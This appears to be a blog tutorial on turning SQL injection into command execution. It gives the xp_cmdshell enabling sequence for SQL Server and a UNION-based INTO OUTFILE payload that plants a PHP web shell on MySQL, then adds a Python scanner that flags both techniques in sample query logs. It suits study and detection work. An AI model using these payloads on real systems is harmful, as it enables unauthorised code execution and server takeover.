Published on March 26, 2025
Gaining code execution through SQL injection requires adapting to the target database engine. Let’s explore two methods: one for Microsoft SQL Server and one for MySQL.
The xp_cmdshell extended stored procedure allows operating-system command execution but is disabled by default. If permissions allow, we can enable it:
SQL> EXECUTE sp_configure 'show advanced options', 1;
SQL> RECONFIGURE;
SQL> EXECUTE sp_configure 'xp_cmdshell', 1;
SQL> RECONFIGURE;
Once enabled, commands can be executed directly:
SQL> EXECUTE xp_cmdshell 'whoami';
This confirms execution as nt service\mssql$sqlexpress. At this point, upgrading to a full reverse shell is possible.
MySQL lacks built-in command execution, but we can write a web shell using the SELECT ... INTO OUTFILE trick:
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null
INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
This writes a basic PHP web shell. The write only succeeds if the database account holds the FILE privilege and secure_file_priv permits writing to that directory, which is why restricting secure_file_priv is the usual mitigation. Access the file via browser and pass commands using the cmd parameter:
http://target/tmp/webshell.php?cmd=id
Successful execution confirms control, typically as the www-data user.
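As an added detection example (not code from the original post), the Python scanner below runs over constructed query-log lines and flags both paths described above: the sp_configure/xp_cmdshell sequence on SQL Server and INTO OUTFILE writes of script files into a web root on MySQL. The log format, host names and severity labels are assumptions.

```python
import re

# Constructed sample query-log lines (not from the original post), one statement
# per line in the form "<host> <engine> <statement>". They replay both techniques
# from the post next to benign traffic.
SAMPLE_LOG = """\
mssql01 mssql SELECT name FROM sys.databases
mssql01 mssql EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;
mssql01 mssql EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;
mssql01 mssql EXECUTE xp_cmdshell 'whoami'
webdb01 mysql SELECT id, title FROM posts WHERE id = 7
webdb01 mysql SELECT id, title FROM posts INTO OUTFILE '/tmp/export.csv'
webdb01 mysql ' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
"""

_Q = r'["\']'  # either SQL string quote style

# (engine, severity, description, pattern); the first matching rule per line wins,
# so the most specific rule for each engine is listed first.
RULES = [
    ("mssql", "critical", "xp_cmdshell executed",
     re.compile(r"\bxp_cmdshell\s+" + _Q, re.I)),
    ("mssql", "high", "xp_cmdshell enabled via sp_configure",
     re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    ("mssql", "low", "advanced options exposed (precursor to enabling xp_cmdshell)",
     re.compile(r"sp_configure\s+'show advanced options'\s*,\s*1", re.I)),
    ("mysql", "critical", "INTO OUTFILE writes a script file under the web root",
     re.compile(r"INTO\s+(?:OUTFILE|DUMPFILE)\s+" + _Q
                + r"/var/www/[^'\"]*\.(?:php|phtml|phar)" + _Q, re.I)),
    ("mysql", "medium", "INTO OUTFILE/DUMPFILE used (file write from the DB account)",
     re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\b", re.I)),
]


def scan(log_text):
    """Return one finding per suspicious statement: (host, severity, description, statement)."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue  # malformed line: no statement field
        host, engine, stmt = parts
        for rule_engine, severity, desc, pattern in RULES:
            if rule_engine == engine and pattern.search(stmt):
                findings.append((host, severity, desc, stmt))
                break
    return findings


if __name__ == "__main__":
    for host, sev, desc, stmt in scan(SAMPLE_LOG):
        print(f"[{sev:8}] {host}: {desc} :: {stmt[:60]}")
```

Running it on the sample log yields five findings, with the enable-then-execute sequence on mssql01 and the web-root write on webdb01 both surfacing at high or critical severity.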